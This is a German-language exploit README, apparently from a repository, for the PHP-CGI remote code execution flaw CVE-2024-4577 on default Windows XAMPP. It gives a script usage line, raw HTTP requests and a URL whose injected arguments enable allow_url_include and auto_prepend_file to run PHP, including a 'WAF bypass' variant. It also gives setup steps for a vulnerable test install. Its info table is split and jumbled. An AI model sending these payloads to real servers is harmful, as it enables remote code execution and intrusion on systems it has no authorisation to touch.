
[Schwachstellenreproduktion] Der weltweit erste EXP, der die PHP-Standardumgebung (XAMPP) für die CVE-2024-4577 PHP-CGI RCE Schwachstelle nutzt.
cgi.force_redirect + REDIRECT-STATUS.allow_url_include, auto_prepend_file, auto_append_file. Kann beliebige Dateien und PHP-Dateien einbinden.allow_url_include, auto_prepend_file, auto_append_file werden nicht verwendet.| Information | Inhalt |
|---|---|
| Schwachstellenname | PHP RCE |
| Schwachstellennummer | CVE-2024-4577 |
| Risikostufe | Hoch |
| Schwachstellentyp |
Kann für WAF-Bypass-Szenarien + Standard-Szenarien verwendet werden:
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
Beispiel:
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
Kann für SSRF-Szenarien + Standard-Szenarien verwendet werden:
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
Kann für Standard-Szenarien verwendet werden:
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
<?php die("Te"."sT");?>
Kann für Standard-Szenarien verwendet werden:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN
<?php die("Te"."sT");?>
XAMPP Windows-Version 8.2.12
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
Oder wählen Sie hier selbst betroffene Versionen aus: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
Keine Änderungen erforderlich, Standardkonfiguration beibehalten
Testen mit obigem EXP
Beobachten Sie, ob die Zeichenkette "TesT" oder der Inhalt der system.ini-Datei des Servers zurückgegeben wird
| RCE |
| Ausnutzungsschwierigkeit | Niedrig |